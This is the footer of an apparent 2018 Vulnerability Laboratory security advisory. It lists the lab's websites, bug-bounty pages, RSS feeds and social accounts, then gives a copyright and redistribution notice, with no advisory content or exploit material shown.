Domains: www.vulnerability-lab.com - www.vulnerability-db.com -  
www.evolution-sec.com  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register.php  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
  
Any modified copy or reproduction, including partially usages, of this  
file, resources or information requires authorization from Vulnerability  
Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other media, are  
reserved by  
Vulnerability Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website is  
trademark  
of vulnerability-lab team & the specific authors or managers. To record,  
list, modify, use or edit our material contact (admin@) to get an ask  
permission.  
  
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution  
Security GmbH]aC/  
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
`